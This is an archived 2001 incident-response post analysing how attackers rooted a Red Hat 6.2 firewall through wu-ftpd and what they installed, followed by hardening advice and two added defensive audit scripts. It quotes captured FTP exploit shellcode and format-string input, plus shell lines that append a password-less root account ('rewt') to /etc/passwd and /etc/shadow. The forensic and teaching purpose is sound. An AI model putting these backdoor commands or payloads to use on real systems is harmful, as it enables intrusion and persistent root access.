Security Incidents mailing list archives
RedHat 6.2 box exploited - analysis of attacker activity
From: Curt Wilson <netw3 () NETW3 COM>
Date: Sun, 4 Feb 2001 06:56:45 -0000
Curt Wilson, Netw3 Consulting, 02/02/2001

This is my first analysis of a Linux box that has been rooted. This is intended to be somewhat of a teaching document, and does not assume a large degree of technical skill. If anyone sees any errors in here or has any comments, I'd be happy to hear from you at netw3 () netw3 com.

The box in question is an unpatched Red Hat Linux 6.2 machine running as an ipchains firewall and IP masquerade server. The attackers' main goal in compromising the system seems to have been setting up a BNC server that allows connections to IRC networks, together with an IRC bot. The attacker also used the compromised Linux system to search for other vulnerable systems running the Washington University FTP server, using two exploits (wu-scan and muje), and attempted or carried out exploits of numerous remote systems with the statdx exploit. The statd exploit attacks the remote procedure call daemon rpc.statd and opens an interactive root shell on TCP port 39168. (For more information on statdx, see the paper by George Bakos at http://www.sans.org/y2k/practical/George_Bakos.html.)

The intruder erased the log directory /var/log, which damaged numerous symlinks. A more careful attacker would have left this directory intact and edited the specific log files to erase their tracks. It is clear from the system analysis that this person is what's known as a script kiddie and does not represent an advanced attacker.

The intruder appears to have penetrated the system using an exploit that attacks wu-ftpd. The default wu-ftp on Red Hat 6.2 (wu-2.6.0(1) in this case) is vulnerable; exploit code has been published on the Internet and is in wide use among the cracker underground. Patches are available on the Red Hat website. The buffer overflow attacks on wu-ftp are delivered through a specially crafted password sequence that results in /bin/sh being spawned.
The IP addresses below are most likely other compromised systems that the attackers are using to break into further sites; one of them may also be the system that was used to crack this box. Logs of attacks in progress:

211.72.123.250 => external_ip_of_linux_system [21] LeLmNnNnUSER ftp NBnPASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
151.15.186.199 => external_ip_of_linux_system [21] Xv+R6-6- user ftp]-1pass 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11a- 3-a-aSITE EXEC %x %x %x %x +%x |%x
156.111.178.186 => external_ip_of_linux_system [21] EEUSER ftp QPASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
syr-24-95-165-70.twcny.rr.com => external_ip_of_linux_system [21] q-q-q-q-USER ftp q-%PASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
211.250.5.4 => external_ip_of_linux_system [21] FFUSER ftp pPASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11
63.105.115.4 => external_ip_of_linux_system [21] L'L'0$L)^1L)^1USER ftp L)k1PASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11

The wu-ftp exploit probably allowed the attacker to bind /bin/sh to a TCP port. The attacker then telnets to that port and has interactive root access. Another method is that the exploit allows the execution of arbitrary code, such as appending a username to the /etc/passwd and /etc/shadow files that is then used through the telnet port. Without detailed logs it's hard to know exactly what the attacker did, since they cleaned up some other commonly exploited services when they first logged in to the system. It's possible that the attacker gained some other means of initial access, but the evidence suggests that these FTP exploits were the means.
A Red Hat announcement about this problem can be found at http://www.redhat.com/support/errata/RHSA-2000-039.html

At some point, this attacker (or other attackers) placed a file in /bin/psr which adds a user named rewt with root level access and a user named mujixi to the /etc/passwd and /etc/shadow files:

echo "rewt:x:0:0:root user,,,:/root:/bin/bash" >>/etc/passwd
echo "mujixi:x:666:666:ala care da muje,,,:/tmp:/bin/bash" >>/etc/passwd
echo "rewt::::::::" >>/etc/shadow
echo "mujixi::::::::" >>/etc/shadow

After obtaining root access, the attacker modified multiple system files and scripts to cover their tracks. /etc/rc.d/rc.sysinit has been modified to run the following:

/usr/sbin/sshd2
/usr/sbin/gpm.root
/usr/sbin/gpm.root

/usr/sbin/gpm.root appears to be controlled by a config file /etc/gpm-root.conf and contains the following commands:

cd /usr/X11R6/include/X11/
This directory is invisible to the standard ls command, but will show up with an ls -a to display all files. This is a common attacker trick. Most of the attacker's tools were placed in this directory.

./linsniffer > tcp.log &
linsniffer captures logins and passwords in an Ethernet environment. A switched network makes this attack more difficult.

/usr/sbin/sshd2 -p 1983
The attacker runs an SSH server on port 1983.

After exploiting the system for root access, the attacker appeared to add a username muje1 to the /etc/passwd and/or /etc/shadow files with a group ID of 501. The attacker also edited the /etc/ftpusers file, perhaps allowing more users to log in through FTP than the original setting. Other suspicious user IDs include muje, and group IDs include 1018 and 1004.

Next, the attacker kills all instances of the lpd process. This is probably so others won't exploit his system through an lpd buffer overflow (never mind that lpd was not an open port from the outside; the attacker wanted to secure his own access). The attacker also removed the portmapper startup file /etc/rc.d/init.d/portmap, which stopped the portmapper from listening on TCP port 111 (never mind that the portmapper was not an open port from the outside). The attacker then cleans up by running updatedb, removing a package named srk.tar.gz (which might be a rootkit), and removing the home directories of users muje and muje1.
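To check a suspect host (or copies of its passwd and shadow files) for the kind of backdoor accounts /bin/psr creates, here is an added shell script; it is not part of the original post. The sample files it builds are constructed from the entries quoted above, and the file paths are assumptions.

```shell
#!/bin/sh
# Added example, not the post's code: audit passwd/shadow copies for the
# backdoor accounts /bin/psr creates. Assumed: the files are copies pulled
# from the suspect host (paths are arguments, so they can live anywhere).

# audit_accounts PASSWD SHADOW : print one line per finding.
audit_accounts() {
    passwd_file=$1
    shadow_file=$2
    # passwd fields: name:pw:uid:gid:gecos:home:shell
    # Any UID-0 account besides root is a second root login (e.g. "rewt").
    awk -F: '$3 == 0 && $1 != "root" { print "UID0 " $1 }' "$passwd_file"
    # A home directory in /tmp is not a real user (e.g. "mujixi").
    awk -F: '$6 == "/tmp" { print "TMPHOME " $1 }' "$passwd_file"
    # An empty second field in shadow means the account logs in with no password.
    awk -F: '$2 == "" { print "NOPASS " $1 }' "$shadow_file"
    # Accounts present in shadow but missing from passwd.
    awk -F: 'NR == FNR { seen[$1] = 1; next } !($1 in seen) { print "ORPHAN " $1 }' \
        "$passwd_file" "$shadow_file"
}

# make_samples : write constructed passwd/shadow files modelled on the
# entries quoted above and print the directory that holds them.
make_samples() {
    dir=$(mktemp -d)
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
rewt:x:0:0:root user,,,:/root:/bin/bash
mujixi:x:666:666:ala care da muje,,,:/tmp:/bin/bash
EOF
    cat > "$dir/shadow" <<'EOF'
root:$1$constructed$notarealhash:11000:0:99999:7:::
bin:*:11000:0:99999:7:::
rewt::::::::
mujixi::::::::
EOF
    echo "$dir"
}

# Usage: d=$(make_samples); audit_accounts "$d/passwd" "$d/shadow"
```

On the constructed sample this reports rewt as a second UID-0 account, mujixi as a /tmp-homed user, and both as password-less.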
The attacker appears to have replaced various system binaries such as netstat, ps, ifconfig, and top to cover their tracks. The replaced version of ps does not show activity such as the linsniffer, and the replaced version of ifconfig does not show the interface running in promiscuous mode. The other replaced binaries are most likely tailored to hide the attacker's activities from administrators' eyes. These replacements may have been done with srk.tar.gz. I was unable to find a published tool named srk but the rk suggests a rootkit. Please see http://packetstorm.securify.com/UNIX/penetration/rootkits/ for a large selection of rootkits.

The group ID 1018 appears to have run the rootkit. The system binaries that were replaced by this activity are as follows:

-rwxr-xr-x 1 1018 users 19840 Nov 25 1998 /sbin/ifconfig
-rwxr-xr-x 1 1018 users 33280 Dec 27 1998 /bin/ps
-rwxr-xr-x 1 1018 users 35300 Jan 2 1999 /bin/netstat
-rwxr-xr-x 1 1018 users 53588 Jan 12 1999 /usr/bin/top
-rwxr-xr-x 1 1018 users 13621 Dec 19 10:14 /bin/vobiscu (unfamiliar)

The group ID 1004 created the following files of interest:

[root@fortran /dev]# ls -al /dev/caca
-rw-rw-r-- 1 root 501 117 Jan 13 21:01 /dev/caca
[root@fortran /dev]# strings /dev/caca
1 193.226.125
1 193.230.192
1 194.102.218
1 193.231.249
3 31221
3 31337
3 89898
3 44113
3 31223
3 22546
3 666
4 6666

31337 is commonly used in the computer underground; many Trojan horse applications listen on port 31337. It is a variation of the word elite. 666 is used by attackers, and port 6666 may refer to an IRC or BNC server.

-rw-rw-r-- 1 root 501 97 Jan 13 21:01 /dev/dsx
[root@fortran /netw3]# strings /dev/dsx | more
3 psybnc
3 wu-scan
3 muje
3 statdx
3 sl2
3 sshd2
3 linsniffer
3 smurf
3 slice
3 mech
3 muh
3 bnc

/dev/dsx appears to be a listing of what the attacker has installed.

-rw-rw-r-- 1 root 501 12288 Jan 13 21:01 /etc/psdevtab

[root@fortran .ssh]# ls -al /root/.ssh
total 16
drwxr-xr-x 2 root 501 4096 Jan 24 00:17 .
drwxr-x--- 8 root root 4096 Feb 2 18:54 ..
-rw------- 1 root root 663 Jan 28 20:41 known_hosts
-rw------- 1 root 501 512 Jan 28 20:41 random_seed

-rw-r--r-- 1 1004 users 307 Aug 31 1998 /usr/man/man6/ssh_config
-rw------- 1 root 501 552 Jan 13 21:01 /usr/man/man6/ssh_host_key
-rw-rw-r-- 1 root 501 356 Jan 13 21:01 /usr/man/man6/ssh_host_key.pub
-rw------- 1 root 501 512 Feb 3 04:55 /usr/man/man6/ssh_random_seed
-rw-r--r-- 1 1004 users 697 Dec 27 1998 /usr/man/man6/sshd_config

/usr/man/man6 is also used by the attacker(s) to store SSH key and configuration files.

The following ports are open and listening on the local (192.168) interface of the system:

21 ftp # point of entry
22 ssh # activated by attacker
23 telnet
25 smtp
79 finger
98 linuxconf
113 auth
513 rlogin
514 rsh
515 lp
1983 ssh # activated by attacker

The primary user that ran the BNC server appears to go by the name of bulangia or buLaneL or bulanel, and a secondary user goes by the name of NINA16. There is evidence of multiple connections to Bulgarian and Italian IRC networks and remote systems. Some of the hosts that used the BNC server include 5dial86.xnet.ro and 11dial217.xnet.ro. Various IRC servers were visited by these users, and if further action were warranted, investigations could take place by connecting to the same IRC networks and attempting to track these people down.

The attacker(s) also installed what appears to be an IRC bot going by the name of eddy or eddybot. The software package used to implement this bot was called emech-2.8, and the config file for e-mech reveals details such as an ircname of H-a-c-k T-h-e F-u-c-k-i-n-g P-l-a-n-e-t ! and channels such as #Linux_mafia. The linkpass and entityname are present in the config and users file, which could allow counterintelligence to be performed if desired.

Recommendations:

Apply patches to Red Hat systems running ipchains firewalls. Red Hat 6.2 has nearly 50 security patches. See http://www.redhat.com/support/errata/rh62-errata-security.html.
Several accounts and passwords were obtained through the use of the linsniffer application. A switched environment can help reduce the risk of sniffing attacks.

Lock down systems to provide defense in depth. Do not simply rely upon ipchains to block hostile traffic. Deny all traffic except what is specifically allowed. Comment out services in /etc/services that do not need to be run (finger, etc.) as well as in /etc/rc.d. If the FTP service will be used, make sure that /etc/ftpusers only allows specific usernames. If an attacker pierces the firewall mechanism, limit what is available by turning off everything that is not needed, leaving only those services that are truly necessary. Portsentry, which is running on the system, is a nice addition, but obviously did not help in this instance. Since the wu-ftp vulnerabilities are widely known, the attacker would only have to find the existence of TCP port 21 with a banner that identified itself as a vulnerable version of wu-ftp. The use of TCP wrappers and ipchains to restrict access to ftpd would be helpful. Modify listening services' banners to reflect false information to confuse attackers and automated exploit/scanning applications.

Systems management should never be performed over an unencrypted connection such as telnet. Install SSH on the server and on your client systems and use it. This encrypts connections and makes it much harder for an attacker to obtain your login credentials.

An intrusion detection system such as snort (www.snort.org) is inexpensive, easy to configure, and in wide use. Snort can monitor a network and alert a network manager (with the proper configuration) via pager or email that an attack is taking place.

Tripwire is a file integrity monitor that can be used to take a snapshot of certain key system files (such as ps, netstat, ifconfig, and many more). When these key system files are changed, an alert can be generated to notify that something suspicious is taking place.
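As an added example of the Tripwire-style check recommended above (this is not code from the original post or from Tripwire itself), here is a minimal baseline-and-compare script built on sha256sum and ls -ln. The baseline path and the file list are assumptions; the baseline has to be taken from a known-good install and kept off the host (read-only media), since an attacker with root can otherwise rewrite it.

```shell
#!/bin/sh
# Added example, not the post's code: minimal Tripwire-style integrity check
# for the binaries a rootkit typically replaces (ps, netstat, ifconfig, top).
# Assumed: the baseline file path and file list are chosen by the operator;
# the baseline is made on a known-good system and stored off the host.

# make_baseline BASELINE FILE... : record sha256, mode and uid:gid per file.
make_baseline() {
    baseline=$1; shift
    for f in "$@"; do
        hash=$(sha256sum "$f" | cut -d' ' -f1)
        # ls -ln prints numeric uid/gid, so an owner like "1018" stands out
        # even if the rootkit also edits /etc/passwd.
        meta=$(ls -ldn "$f" | awk '{ print $1 ":" $3 ":" $4 }')
        printf '%s %s %s\n' "$hash" "$meta" "$f"
    done > "$baseline"
}

# check_baseline BASELINE : print one line per deviation; return 1 if any.
check_baseline() {
    baseline=$1
    rc=0
    while read -r hash meta f; do
        if [ ! -e "$f" ]; then
            echo "MISSING $f"; rc=1; continue
        fi
        cur_hash=$(sha256sum "$f" | cut -d' ' -f1)
        cur_meta=$(ls -ldn "$f" | awk '{ print $1 ":" $3 ":" $4 }')
        [ "$cur_hash" = "$hash" ] || { echo "HASH $f"; rc=1; }
        [ "$cur_meta" = "$meta" ] || { echo "META $f $meta -> $cur_meta"; rc=1; }
    done < "$baseline"
    return $rc
}

# Usage on a real host (the binaries replaced on the box in this post):
#   make_baseline /mnt/cdrom/baseline.txt /bin/ps /bin/netstat /sbin/ifconfig /usr/bin/top
#   check_baseline /mnt/cdrom/baseline.txt
```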
There are freeware/GPL options for SSH (OpenSSH) and a freeware Tripwire clone available on the Internet (see www.whitehats.com for a large collection of open source security tools).

Curt Wilson - Netw3 Consulting
netw3 () netw3 com